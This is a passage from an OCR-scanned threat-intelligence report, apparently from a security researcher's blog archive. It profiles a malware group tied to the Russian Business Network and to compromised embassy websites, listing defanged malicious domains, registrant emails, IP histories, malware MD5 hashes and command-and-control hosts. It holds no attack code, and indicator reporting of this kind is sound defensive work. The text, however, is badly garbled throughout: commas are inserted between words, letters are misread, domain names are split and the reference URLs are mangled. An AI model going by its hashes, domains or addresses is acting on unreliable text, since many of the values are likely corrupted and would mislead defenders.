hxxp://cfca-usa.com 
hxxp://cfociaiiy.biz 
hxxp://citizenfi nanciai.net 
hxxp://cityienci ing.net 
hxxp ://ciean2 maii.com 
hxxp://confirm-acti vation.com 
hxxp ://consu itingwiz.org 
hxxp ://cou rierusa-oniine.com 
hxxp ://cristh masx.com 
hxxp ://ci-stan iey.net 
hxxp ://ciariazacheri. info 



hxxp://des-g roup.com 

hxxp://d igital-investment-projects.com 

hxxp://d ns4your.net 

hxxpV/dvasuka.com 

hxxp://easy-mid nig ht.com 

hxxp://easy-transfer.biz 

hxxp://easymid nig ht.com 

hxxp://ecareerstyie.com 

hxxp://ecnoho.com 

hxxp://efinanciai news, biz 

hxxp://ei uxuryauctions.com 

hxxp://eix-itd.net 

hxxp://eix-trad ing.org 

hxxp://eixitd.net 

hxxp://emoney-ex.com 

hxxp://epsincorp.net 

hxxp://equitrust.org 

hxxp://erobersteng.com 

hxxp://erxiog istics.com 

hxxp://esdeais.com 



hxxp://esteman iaks.com 
hxxp://eu-bis.com 
hxxp://eu-cel lular.com 
hxxp://eubiz.org 
hxxp://euwork.org 
hxxpV/expressdeal.info 
hxxp://ezaclo.net 
hxxp://fai rwaylencling.org 
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hxxp://fan-gami ng.org 
hxxp://fci nternatonail.com 
hxxpV/fideiityiend ing.net 
hxxp://fi nanciai-forbes.com 
hxxp://fi nanciainews-us.net 
hxxp://fi rstcapitaigroup.org 
hxxp://f reemydns.org 
hxxp://fremontiend ing.net 
hxxp://fresh-soi utions-maii.com 
hxxp://fresh-soiutions.us 
hxxp ://garnantfou ndation.com 



hxxp://gazenvagen.com 
hxxp://globerental.com 
hxxp://googmail.biz 
hxxp://i-expertadvisor.com 
hxxp://icebart.com 
hxxp://icqdosug.com 
hxxp://iesecurityu pdates.com 
hxxp://i ndigo-consulting.org 
hxxp://i ndigo-job-with-us.com 
hxxp://i ndigojob.com 
hxxp://i ndigovacancies.com 
hxxp://i nncoming.com 
hxxp://i vsentns.com 
hxxp://iwiwlive.net 
hxxp://i wiwonline.net 
hxxp://jobs-in-eu.org 
hxxp://kelerma ket.com 
hxxp://kklfnews.com 
hxxp://knses.com 
hxxp://komodok.com 



hxxp://krdns.biz 
hxxp://ksfcnews.com 
hxxp://ksfcrad io.com 
hxxp://ktes314.org 
hxxp://lda-i mport.com 
hxxp://legal-sol utions.org 
hxxp://igcareer.com 
hxxp://igtcareer.com 
hxxp://i ibrarysp.com 
hxxp://iittiexz.com 
hxxp://mariawebber.org 
hxxp://mega mu ie.net 
hxxp://moneycnn.biz 
hxxp://nj nk.net 
hxxp://ns4ur.net 
hxxp://nytimesnews.biz 
hxxp://o2cash.net 
hxxp://offsoftsoi utions.com 
hxxp://pcpro-tbstu mm.com 
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hxxp://perfect-i nvestments.org 

hxxp://progold-inc.biz 

hxxp://protectedsession.com 

hxxp://razsu ka.com 

hxxp://reutors.biz 

hxxp://rushop.us 

hxxp://science-and-trade.com 

hxxp://secu re-operations.org 

hxxp://secu resitinngs.com 

hxxp://servicessupport.biz 

hxxp://sessionprotected.com 

hxxp://sicil.info 

hxxp://sicil256.info 

hxxp://si mple-investments-mail.org 

hxxp://si mple-investments.net 

hxxp://si mple-investments.org 

hxxp://sp3l ibrary.com 

hxxp://speeduserhost.com 

hxxp://storempi re.com 

hxxp://tas-corporation.com 



hxxp://tas-corporation.net 

hxxp://tascorporation.net 

hxxp://topixus.net 

hxxp://tsrcorp.net 

hxxp://u-file.org 

hxxp://u kashauction.net 

hxxp://u ltragame.org 

hxxp://u nitedfinancegroup.org 

hxxp://vanessakoepp.org 

hxxp://very monkey.com 

hxxp://vesa-g roup.com 

hxxp://vesa-g roup, net 

hxxp://vipvipns.net 

hxxp://vipvipns.org 

hxxp://wondooweria.com 

hxxp://wondoowerka.com 

hxxp://wootpwnseal.com 

hxxp://worldeconomist.biz 

hxxp://wu mtt-westernunion.com 

hxxp://xsoft wares.com 



hxxp://xxx2008xxx.com 
hxxp://you rcashlive.com 
hxxp://yourlive.biz 
hxxp://you rmule.com 

On 2008-09-25 Oki.ru was registered using the 
kseninkopetrcanm.ru emaii. 

The same emaii address is not 

known to have been used to register any additionai domains. 

On 2008-06-19 xl2345.org was registered using the 
xix.xl2345(g)yahoo.com emaii. 

On 2007-09-10 the do¬ 
main use to respond to 66.36.243.97, then on 2007-11-13 it 
changed iPs to 58.65.236.10, foiiowing another change 
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on 2008-05-06 to 203.186.128.154. No other domains are 
known to have been registered using the same emaii 

address. 

On 2007-06-07, miron555.org was registered using the 
mironbot(g)gmaii.com emaii, foiiowed by another regis¬ 
tration emaii change on 2008-02-12 to 
nepishite555suda(g)gmaii.com. On 2007-04-24, the domain 
responded to 



75.126.4.163. It then changed IPs on 2007-05-09 to 
203.121.71.165, followed by another change on 2007-06-08 
to 

58.65.239.247, yet another change on 2007-07-15 to 
58.65.239.10, another change on 2007-08-19 to 
58.65.239.66, 

more IP changes on 2007-09-03 to 217.170.77.210, and yet 
another change on 2007-09-18 to 88.255.90.138. 

Historically (up to present day), mironbot@gmail.com 
is also known to have been used to register the fol¬ 
lowing domains: 

hxxp://24-7on I inepharmacy.net 

hxxp://bestmovieson line, info 

hxxp://brig htstonepharma.com 

hxxp://deapotheke.com 

hxxp://dozor555.info 

hxxp://my-traff.cn 

hxxp://pharmacyit.net 

hxxp://trffc.org 

hxxp://trffc3.ru 

hxxp://xmpharm.com 

In, 2008, I, profiled, the, direct, compromise, of, [13]The 

Dutch Embassy in Moscow Serving Malware, fur- 



ther, detailing, the, malicious, and, activity, of, the, Russian, 
Business, Network, and, the. New, Media, Malware, 

Gang. 

Let's, profile, the, campaign, and, discuss, in-depth, the, 
direct, connection, between, the, group's, activities, 

and, the, direct, compromise, of, the. Embassy's Web, site. 

On 2009-03-04, lmifsp.com was registered using the 
redemption(g)snapnames.com email. 

On 2007-11-30, it 

used to respond to 68.178.194.64, then on 2008-12-01 it 
changed IPs to 68.178.232.99. 

In, 2008, I, profiled, the, direct, compromise, of, 
[14]Embassy of Brazil in India Compromised, further, 
estab¬ 
lishing, a, direct, connection, between, the, group's, 
activities, and, the, Russian, Business, Network. 

Let's, profile, the, campaign, and, discuss, in-depth, the, 
direct, connection, between, the, group's, activities, 

and, the, Russian, Business, Network. 

hxxp://google-analyze.com - 87.118.118.193 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(google- 

analyze.com - 87.118.118.193): 



MD5: 2bcb74c95f30e3741210c0de0clb406f 


On 2008-10-15, traff.asia was registered using the 
traffon(g)gmail.com email. 

On 2008-06-19, google-analyze.com was registered using 
the incremental(g)list.ru email. On 2007-12-21 it re¬ 
sponded to 66.36.241.153, then it changed IPs on 2007-12- 

22 to 66.36.231.94, followed by another change on 

2008-02-03 to 79.135.166.74, then to 195.5.116.251 on 
2008-03-16, to 70.84.133.34 on 2008-07-31, followed by yet 

another change to 216.195.59.77 on 2008-09-15. 
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On 2008-08-05, google-analystic.net, is, known, to, have, 
responded, to, 212.117.163.162, and, was registered using 
the abusecentre(g)gmail.com email. On 2008-04-11 it used to 
respond to 64.28.187.84, it then changed 

IPS to 85.255.120.195 on 2008-08-03, followed by another 
change on 2008-08-10 to 85.255.120.194, then to 

85.255.120.197 on 2008-09-07, to 69.50.161.117 on 2008- 
09-14, then to 66.98.145.18 on 2008-10-11, followed by 

another change on 2008-10-25 to 209.160.67.56. 

On 2008-11-11, beshragos.com was registered using the 
migejosh(g)yahoo.com email. On 2008-11-11 it used 

to respond to 79.135.187.38. 

In, 2009, I, profiled, the, direct, compromise, of, 

[15]Ethiopian Embassy in Washington D.C Serving 



Malware, 


further, detailing, the, group's, activities, further, 
establishing, a, direct, connection, between, the, group's, 
activities, and, the, Russian, Business, Network. 

Let's, profile, the, campaign, and, discuss, in-depth, the, 
direct, connection, between, the, group's, activities, 

and, the, Russian, Business, Network. 

On 2009-01-19, ltvv.com is, known, to, have, responded, 
to, 69.172.201.153; 66.96.161.140; 122.10.52.139; 

122.10.18.138; 67.229.44.15; 74.200.250.130; 
69.170.135.92; 64.74.223.38, and, was registered using the 
mo- 

gensen(g)fontdrift.com email. 

On 2005-08-27, the domain (ltvv.com) is, known, to, have, 
responded to 198.65.115.93, then on 2006-05-12 

to 204.13.161.31, with yet another IP change on 2010-04-08 
to 216.240.187.145, followed by yet another change on 

2010-06-02 to 69.43.160.145, then on 2010-07-25 to 
69.43.160.145. 

On 2010-01-04, trafficinc.ru was registered using the 
auction(g)r01.ru email. 

On 2009-03-01, trafficmonsterinc.ru was registered using 
the trafficmonsterinc.ru(g)r01-service.ru email. 

On 2009-05-02, usl8.ru, is, known, to, have, responded, to, 
109.70.26.37; 185.12.92.229; 109.70.26.36, and. 



was registered using the belyaev _andrey(g)inbox.ru email. 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs: 

MD5: 0b545cdl2231d0a4239ce837cd371166 

MD5: dae41c862130daebcff0e463e2c30e50 

MD5: 601806c0a01926c2a94558148764797a 

MD5: 45f97cd8df4448bbe073a38c264ef93f 

MD5: 94aeba45e6fb4dl7baa4989511e321b3 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 

(69.172.201.153): 

MD5: 4e0ce2f9f92ac5193c2a383de6015523 

MD5: a38d47fcfdafl4372cea3de850cf487d 

MD5: 014d2flbae3611e016f96a37f98fd4b7 

MD5: daad60cb300101dc05d2ff922966783b 

MD5: 0a775110077e2c583be56e5fb3fa4f09 

Once, executed, a, sample, malware (MD5: 
4e0ce2f9f92ac5193c2a383de6015523), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://pelcpawel.fm.interia.pl - 217.74.66.160 
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hxxp://pelcpawel.fm.interiowo.pl - 217.74.66.160 
hxxp://chicostara.com - 91.142.252.26 
hxxp://suewyl I ie.com 

hxxp://dewpoint-eg.com - 195.157.15.100 
hxxp://sso.anbtr.com - 195.22.28.222 

Once, executed, a, sample, malware (MD5: 
a38d47fcfdafl4372cea3de850cf487d), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://leclyazilim.com - 213.128.83.163 
hxxp://ksanclrafashion.com - 166.78.145.90 
hxxp://lafyeri.com - 69.172.201.153 
hxxp://kulppasur.com - 52.28.249.128 
hxxp://toallaclepapel.com.ar 

hxxp://trafficinc.ru, is, known, to, have, responded, to, 
222.73.91.203 

hxxp://trafficmonsterinc.ru, is, known, to, have, responded, 
to, 178.208.83.7; 178.208.83.27; 91.203.4.112 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs: 

MD5: Ce4e2el2eel6d5bde67a3dc2e3da634b 


MD5: 4423e04fb3616512bf98b5a565fccdd7 



MD5: 33f890c294b2ac89dlee657b94e4341d 

MD5: Ic5096c3ce645582ddl8758fe523840a 

MD5: Iefae0b0cb06faacae46584312al2504 

Once, executed, a, sample, malware (MD5: 
Ce4e2el2eel6d5bde67a3dc2e3da634b), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://rms-server.tektonit.ru - 109.234.156.179 

hxxp://365invest.ru - 178.208.83.7 

Once, executed, a, sample, malware (MD5: 
4423e04fb3616512bf98b5a565fccdd7), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://topstat.mcdir.ru - 178.208.83.7 

Once, executed, a, sample, malware (MD5: 
33f890c294b2ac89dlee657b94e4341d), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://cadretest.ru - 178.208.83.7 

Once, executed, a, sample, malware (MD5: 
Ic5096c3ce645582ddl8758fe523840a), phones, 
back, to, the. 


following, malicious, C &C, server, IPs: 



hxxp://pelcpawel.fm.interia.pl - 217.74.65.161 
hXXp://testtrade.ru - 178.208.83.7 
hxxp://chicostara.com - 91.142.252.26 

In, 2009, I, profiled, the, direct, compromise, of [16]Embassy 
of India in Spain Serving Maiware, further, de¬ 
tailing, the, malicious, activity, further, establishing, a, direct, 
connection, between, the, group's, activities, and, the, 
Russian, Business, Network. 

On 2008-09-07, msn-anaiytics.net was registered using 
the palfreycrossvw(g)gmail.com email. On 2007-06-17 

it used to respond to 82.98.235.50, it then changed IPs on 

2008- 09-07 to 58.65.234.9, followed by another change 
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on 2009-11-14 to 96.9.183.149, then to 96.9.158.41 on 

2009- 12-29, and to 85.249.229.195 on 2010-03-09. 

On 2008-07-10, pinoc.org was registered using the 
4ykakabra(g)gmail.com email. On 2008-07-10 it responded 

to 58.65.234.9, it then changed IPs on 2008-08-17 to 
91.203.92.13, followed by another change on 2008-08-24 to 

58.65.234.9, followed by yet another change to 
208.73.210.76 on 2009-10-03, and yet another change on 
2009-10-06 

to 96.9.186.245. 

On 2008-09-20, wsxhost.net was registered using the 
palfreycrossvw(g)gmail.com email. On 2008-09-20 wsx- 



host.net responded to 58.65.234.9, it then changed IPs on 

2008- 12-22 to 202.73.57.6, followed by another change 

on 2009-05-18 to 202.73.57.11, yet another change on 

2009- 06-22 to 92.38.0.66, then to 91.212.198.116 on 

2009-07-06, yet another change on 2009-08-17 to 
210.51.187.45, then to 210.51.166.239 on 2009-08-25, and 
finally 

to 213.163.89.54 on 2009-09-05. 

On 2008-06-29 google-analyze.cn was registered using 
the johnvernet(g)gmail.com email. 

Historically (up to present day) 

johnvernet@gmail.com is known to have registered 
the following domains: 

hxxp://baidustatz.com 

hxxp://edcomparison.com 

hxxp://google-analyze.org 

hxxp://google-stat.com 

hxxp://kol koman.com 

hxxp://m-analytics.net 

hxxp://pinalbal.com 

hxxp://pornokman.com 

hxxp://robokasa.com 

hxxp://rx-wh ite.com 



hxxp://sig4forum.com 
hxxp://theka pita.com 
hxxp://visittds.com 

msn-analytics.net, is, known, to, have, responded, to, 
216.157.88.21; 85.17.25.214; 216.157.88.22; 85.17.25.215; 

85.17.25.202; 216.157.88.25; 5.39.99.49; 167.114.156.214; 
5.39.99.50; 66.135.63.164; 85.17.25.242; 69.43.161.210 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs: 

MD5: eb95798965al8e7844f4c969803fbaf8 

MD5: 106b6e80be769fa4a87560f82cd24b57 

MD5: 519a9flcbl6399c515723143bf7ff0d0 

MD5: b537c3d65ecc8ac0f3cd8d6bf3556da5 

MD5: 613e8c31edf4dalb8f8de9350al86f41 

Once, executed, a, sample, malware (MD5: 
eb95798965al8e7844f4c969803fbaf8), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://vboxsvr.ovh.net 

hxxp://thinstaii.abetterinternet.com - 85.17.25.214 
hxxp://survey-winner.net - 94.229.72.117 
hxxp://survey-winner.net - 208.91.196.145 



hxxp://comedy-planet.com 

Once, executed, a, sample, malware (MD5: 
106b6e80be769fa4a87560f82cd24b57), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 
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hxxp://memberfortieth.net 

hxxp://beg inadvance.net 

hxxp://knownadvance.net 

hxxp://begi nstranger.net 

hxxp://knownstranger.net - 23.236.62.147 

Once, executed, a, sample, malware (MD5: 
b537c3d65ecc8ac0f3cd8d6bf3556da5), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://fol lowfortieth.net 

hxxp://memberfortieth.net 

hxxp://beg inadvance.net 

hxxp://knownadvance.net 

hxxp://begi nstranger.net 

hxxp://knownstranger.net - 23.236.62.147 



pinoc.org, is, known, to, have, responded, to, 
103.224.212.222; 185.53.179.24; 185.53.179.9; 
185.53.177.10; 

188.40.174.81; 46.165.247.18; 178.162.184.130 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs: 

MD5: 000125b0d0341fc078c7bdb5b7996f9e 

MD5: b3bbeaca85823d5c47e36959b286bb22 

MD5: 4faa9445394ba4edf73dd67e239bcbca 

MD5: 9f3b9de8a3e7cd8ee2d779396799bl7a 

MD5: 38d07b2all89eblfd64296068fbaf08a 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp://os.onIineapplicationsdownloads.com - 
103.224.212.222 

hxxp://static.greatappsdownload.com - 54.230.187.48 

hxxp://wwl.os.on I ineapplicationsdownloads.com - 
91.195.241.80 

hxxp://os2.on I ineapplicationsdownloads.com - 
103.224.212.222 

hxxp://wwl.os2.onlineapplicationsdownloads.com - 
91.195.241.80 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 



hxxp://errors.myserverstat.com - 103.224.212.222 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp://scripts.dlv4.com - 103.224.212.222 

hxxp://ww38.scripts.dlv4.com - 185.53.179.29 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp://complaintsboard.com - 208.100.35.85 

hxxp://7ew8gov.firoli-sys.com - 103.224.212.222 

hxxp://yx-vom2s.hdmediastore.com - 45.33.9.234 

hxxp://q8x3kb.wwwmediahosts.com - 204.11.56.48 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp://newworldorderreport.com - 50.63.202.29 

hxxp://69jh93.firoli-sys.com - 103.224.212.222 

hxxp://bpvvllndq5.wwwmediahosts.com - 204.11.56.48 

hxxp://Odbhwuja.hdmediastore.com - 45.33.9.234 
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wsxhost.net, is, known, to, have, responded, to, 
184.168.221.45; 50.63.202.82; 69.43.161.172 

Related, malicious, MD5s, known, to, have, 
responded, to, the, same, malicious, C &C, server, 
IPs: 



MD5: 117036e5a7b895429e954f733e0acada 

MD5: 1172e5a2ca8a43a2a2274f2c3b76a7be 

MD5: 6e330742d22c5a5e99e6490de65fabd6 

MD5: flc9cd766817ccf55e30bb8af97bfdbb 

MD5: 7f4145bc211089d9d3c666078c35cf3d 

Once, executed, a, sample, malware (MD5: 
117036e5a7b895429e954f733e0acada), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://a macweb.org 

hxxp://su peraffiliatehookup.com 

hxxp://germanamerica ntax.com 

hxxp://lineaidea.it 

hxxp://speedysalesletter.com 

Once, executed, a, sample, malware (MD5: 
1172e5a2ca8a43a2a2274f2c3b76a7be), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://allstatesdui.com - 50.63.202.36 
hxxp://wellingtontractorparts.com - 72.167.232.158 
hxxp://amacweb.org - 160.16.211.99 
hxxp://nctcogic.org - 207.150.212.74 



Once, executed, a, sample, malware (MD5: 
6e330742d22c5a5e99e6490de65fabd6), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://santele.be - 176.62.170.69 
hxxp://fever98radio.com - 141.8.224.93 
hxxp://brushnpaint.com - 74.220.219.132 
hxxp://jameser.com - 54.236.195.15 
hxxp://hillsdemocrat.com - 67.225.168.30 

Once, executed, a, sample, malware (MD5: 
flc9cd766817ccf55e30bb8af97bfdbb), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 

hxxp://lordofthepings.ru - 109.70.26.37 

hxxp://afterpeace.net - 195.38.137.100 

hxxp://sellhouse.net - 184.168.221.45 

Once, executed, a, sample, malware (MD5: 
7f4145bc211089d9d3c666078c35cf3d), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 109.70.26.37 



hxxp://forcerain.net 
hxxp://afterrain.net - 50.63.202.43) 
hxxp://forcera in.ru 
hxxp://forceheld.net 

google-analyze.cn, is, known, to, have, responded, to, 
103.51.144.81; 184.105.178.89; 65.19.157.235; 
124.16.31.146; 
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123.254.111.190; 

103.232.215.140; 

103.232.215.147; 

205.164.14.78; 

50.117.116.117; 

50.117.120.254; 

205.164.24.45; 50.117.116.205; 50.117.122.90; 
184.105.178.84; 50.117.116.204 

Related malicious MD5s known to have phoned back 
to the same malicious C server, IPs: 

MD5: df05460b5e49cbba275f6d5cbd936dld 

MD5: 7732ffcf2f4cfld834b56dflf9d815c9 

MD5: 615eb515dal8feb2b87c0fb5744411ac 


MD5: 24fec5b3acld20e61f2a3de95aebl77c 



MD5: 348eed9b371ddb2755eb5c2bfaa782ee 

On 2008-08-27, yahoo-analytics.net was registered using 
the fuadrenalray(g)gmail.com email. 

- google-analyze.org - Email: johnvernet(g)gmail.com - on, 
2008-07-09, google-analyze.org , is, known, to, have, 
responded, to, 58.65.234.9, followed, by, a, hosting, change, 
on, 2008-08-17, with, google-analyze.org, responding, 

to, 91.203.92.13, followed, by, another, hosting, change, on, 

2008- 08-24, with, google-analyze.org, responding, to, 

202.73.57.6. 

- qwehost.com - Email: 4ykakabra(g)gmail.com - on, 2009- 
05-18, qwehost.com, is, known, to, have, responded, 

to, 202.73.57.11, followed, by, a, hosting, change, to, 
202.73.57.11, followed, by, another, hosting, change, on, 

2009- 06-22, pointing, to, 92.38.0.66, followed, by, yet, 
another, hosting, change, pointing, to, 91.212.198.116, 

followed, by, yet, another, hosting, change, on, 2009-08-17, 
pointing, to, 210.51.187.45. 

- zxchost.com - Email: 4ykakabra(g)gmail.com - on, 2009- 
03-02, zxchost.com, is, known, to, have, responded, 

to, 202.73.57.6, followed, by, a, hosting, change, on, 2009- 
05-18, pointing, to, 202.73.57.11, followed, by, yet, 

another, hosting, change, on, 2009-06-22, pointing, to, 
92.38.0.66, followed, by, yet, another, hosting, change, on. 


2009-08-25, pointing, to, 210.51.166.239. 



- odile-marco.com - Email: OdileMarcotte(g)gmail.com - on, 
2009-05-18, odile-marco.com, is, known, to, have, 

responded, to, 202.73.57.6, followed, by, a, hosting, change, 
on, 2009-06-22, pointing, to, 202.73.57.11, followed, by, 

yet, another, hosting, change, on, 2009-07-06, pointing, to, 
92.38.0.66, followed, by, yet, another, hosting, change, 

on, 2009-08-17, pointing, to, 91.212.198.116. 

- edcomparison.com - Email: johnvernet(g)gmail.com - on, 
2009-05-18, edcomparison.com, is, known, to, have, 

responded, to, 202.73.57.6, followed, by, a, hosting, change, 
on, 2009-06-22, pointing, to, 202.73.57.11, followed, 

by, yet, another, hosting, change, on, 2009-07-13, this, time, 
pointing, to, 92.38.0.66, followed, by, yet, another, 

hosting, change, on, 2009-08-17, this, time, pointing, to, 
210.51.187.45. 

- fuadrenai.com - Email: fuadrenalRay(g)gmail.com - on, 
2009-01-26, fuadrenai.com, is, known, to, have, re¬ 
sponded, to, 202.73.57.6, followed, by, a, hosting, change, 
on, 2009-05-18, pointing, to, 202.73.57.11, followed, by, 

yet, another, hosting, change, on, 2009-07-13, this, time, 
pointing, to, 91.212.198.116, followed, by, yet, another, 

hosting, change, on, 2009-08-17, this, time, pointing, to, 
91.212.198.116. 

- rx-white.com - Email: johnvernet(g)gmail.com - on, 2009- 
05-18, rx-white.com, is, known, to, have, responded, to. 



202.73.57.6, followed, by, a, hosting, change, on, 2009-06- 
22, pointing, to, 202.73.57.11, followed, by, yet, another, 

hosting, change, on, 2009-07-06, this, time, pointing, to, 
92.38.0.66, followed, by, yet, another, hosting, change, on, 

2009-08-17, this, time, pointing, to, 91.212.198.116. 

In, 2009, I, profiled, the, direct, compromise, of, 

[17] Eiinbassy of Portugal in India Serving Malware, 

further, 

establishing, a, direct, connection, between, the, group's, 
activities, and, the, Russian, Business, Network. 
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On, 2009-03-30, ntkrnipa.info, is, known, to, have, 
responded, to, 83.68.16.6. Related, domains, known, to, 
have, participated, in, the, same, campaign - 

betstarwager.cn; ntkrnlpa.cn. 

In, 2007, I, profiled, the, direct, compromise, of, French 
Embassy in Libya Serving Malware, further, establish¬ 
ing, a, direct, connection, between, the, group's, activities, 
and, the, Russian, Business, Network. 

On, 2008-11-05, tarog.us (Email: bobbyl0(g)mail.zp.ua), 
used, to, respond, to, 67.210.13.94, followed, by, a, 

hosting, change, on, 2009-03-02, pointing, to, 
208.73.210.121. Related, domains, known, to, have, 
participated, in, 

the, campaign: fernandol23.ws; winhex.org - Email: 

[18] ipspec(g)gmail.com 



On, 2007-02-18, winhex.org, used, to, respond, to, 
195.189.247.56, followed, by, a, hosting, change, on, 2007- 
03- 

03, pointing, to, 89.108.85.97, followed, by, yet, another, 
hosting, change, on, 2007-04-29, this, time, pointing, 

to, 203.121.71.165, followed, by, yet, another, hosting, 
change, on, 2007-08-19, this, time, pointing, to, 
69.41.162.77. 

On, 2007-11-23, kjlksjwflk.com (Email: 
sflgjlkj45(g)yahoo.com), used, to, respond, to, 58.65.239.114, 
followed, 

by, a, hosting, change, on, 2009-02-16, pointing, to, 
38.117.90.45, followed, by, yet, another, hosting, change, 
on, 

2009-03-09, this, time, pointing, to, 216.188.26.235. 

In, 2009, I, profiled, the, direct, compromise, of, 

[19] Azerbaijanian Embassies in Pakistan and Hungary 
Serv¬ 
ing Maiware, further, establishing, a, direct, connection, 
between, the, group's, activities, and, the, Russian, 

Business, Network. 

Reiated, domains, known, to, have, participated, in, 
the, campaign: 

- hxxp://filmlifemusicsite.cn; hxxp://promixgroup.cn; 
hxxp://betstarwager.cn; hxxp://clickcouner.cn 

In, 2009, I, profiled, the, direct, compromise, of, 

[20] USAiD.gov compromised, maiware and expioits 



served, 


further, establishing, a, direct, connection, between, the, 
gang's, activities, and, the. New, Media, Malware, Gang. 

Related, domains, known, to, have, participated, in, 
the, campaign: 

hxxp://should-be.cn - Email: admin(g)brut.cn; 
hxxp://orderasia.cn; hxxp://fileuploader.cn 

In, 2007, I, profiled, the, direct, compromise, of, [21]U.S 
Consulate St. Petersburg Serving Malware, further, 

establishing, a, direct, connection, between, the, group's, 
activities, and, the, Russian, Business, Network. 

On, 2007-08-31, verymonkey.com (Email: 
srvs4you(g)gmail.com), used, to, respond, to, 212.175.23.114, 
fol¬ 
lowed, by, a, hosting, change, on, 2007-09-07, pointing, to, 
209.123.181.185, followed, by, yet, another, hosting, 

change, on, 2007-09-27, this, time, pointing, to, 
88.255.90.50, followed, by, yet, another, hosting, change, 
on, 

2008-11-11, this, time, pointing, to, 216.188.26.235. 

What's, particularly, interested, about, the, gang's, activities, 
is, the, fact, that, back, in 2007, the, group, pio¬ 
neered, for, the, first, time, the, utilization, of, Web, malware, 
exploitation, kits, further, utilizing, the, infrastructure, of, 
the, Russian, Business, Network, successfully, launching, a, 
multi-tude, of, malicious, campaigns, further, spreading. 



malicious, software, further, utilizing, the, infrastructure, of, 
the, Russian, Business, Network. 

Related posts: 

[22] Syrian Embassy in London Serving Malware 

[23] USAID.gov compromised, malware and exploits served 

[24] U.S Consulate St. Petersburg Serving Malware 

[25] Bank of India Serving Malware 

[26] French Embassy in Libya Serving Malware 
30 

[27] The Dutch Embassy in Moscow Serving Malware 

[28] Ethiopian Embassy in Washington D.C Serving Malware 

[29] Embassy of India in Spain Serving Malware 

[30] Azerbaijanian Embassies in Pakistan and Hungary 
Serving Malware 
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malware-and-exDloits-%20%20served/ 

6 . 

httDs://web- 

beta.arch ive.or a /web/2 010101619192 5/httD://ddanchev. blo g 
S DOt.eom/2007/09/us-consulate-st-Dete 

rsbur a -servin a .html 

7. httDs://web- 

beta.arch ive.or a /web/2 0101016191941/http://ddanchev. blo g 
s pot.com/2 007/08/ban k-of-indi a-servin g- 

malware.html 

8 . 

https://web- 

beta.arch i ve.or a /web/2 010112 62020 ll/http://ddanchev. blo g 
s pot.com/2007/12/have-vour-mal ware-in 

-timelv-fashion.html 













































9. 


httDs://web- 

beta.archive.or a /web/20120304075303/httD://ddanchev.blo a 

s pot.eom/2009/Q3/ethiopian-embassv-in 

-washin a ton-dc.htmi 

10. httDs://web- 

beta.archive.or a /web/2 013122 2 200157/http://ddanchev.bio a 
S DOt.com/2009/Ql/embassv-of-india-in- 

s pain-servin a .htmi 

11. https://web- 

beta.archive.or a /web/20120303071653/http://ddanchev.bio a 
s pot.eom/2009/03/azerbai i anian-embass 

ies-in-pakistan-and.htmi 

12. https://ddanchev.bio as pot.eom/2013/08/dissectin a- 
sampie-russian-business.htmi 

13. https://web- 

beta.archive.or a /web/2 0080221124306/http://ddanchev.bio a 
s pot.eom/2Q08/01/dutch-embassv-in-mos 

cow-servin g -maiware.htmi 

14. https://web- 

beta.archive.or a /web/201203030Q0438/http://ddanchev.bio a 

s pot.eom/2008/ll/embassv-of-brazii-in 

-india-compromised.htmi 

15. https://web- 

beta.archive.or a /web/20120304075303/http://ddanchev.bio a 
s pot.eom/2009/03/ethiopian-embassv-in 




















































-washin a ton-dc.html 


16. httDs://web- 

beta.archive.or a /web/20131222200157/httD://ddanchev.blo a 

s pot.com/2009/01/embassv-of-india-in- 

S Dain-servin a .html 

17. httDs://web- 

beta.arch ive.or a /web/2 010112 70202 Q3/http://ddanchev. blo g 
S DOt.com/2009/03/embassv-of-Dortu aal- 

in-india-servin a .html 

18. mailto:i DSDec@a mail.com 

19. httDs://web- 

beta.archive.or a /web/201203Q3Q71653/httD://ddanchev.blo a 

S DOt.eom/2009/03/azerbai i anian-embass 

ies-in-Dakistan-and.html 

20. httD://www.zdnet.com/article/usaid- a ov-comDromised- 
malware-and-exDloits-served/ 

21. httDs://web- 

beta.arch ive.or a /web/2 010101619192 5/httD://ddanchev. blo g 
S DOt.eom/2007/09/us-consulate-st-Dete 

rsbur a -servin a .html 

22. httDs://web- 

beta.arch ive.or a /web/2 010101619192 5/http://ddanchev. blo g 
S DOt.eom/2007/09/svrian-embassv-in-lo 

ndon-servin a .html 























































23. httD://www.zdnet.com/article/usaid- a ov-comDromised- 
malware-and-exDloits-served/ 


24. httDs://web- 

beta.arch ive.or a /web/2 010101619192 5/http://ddanchev. blo g 
s pot.eom/2007/09/us-consulate-st-pete 

rsbur a -servin a .html 

25. https://web- 

beta.arch ive.or a /web/2 0101016191941/httD://ddanchev. blo g 
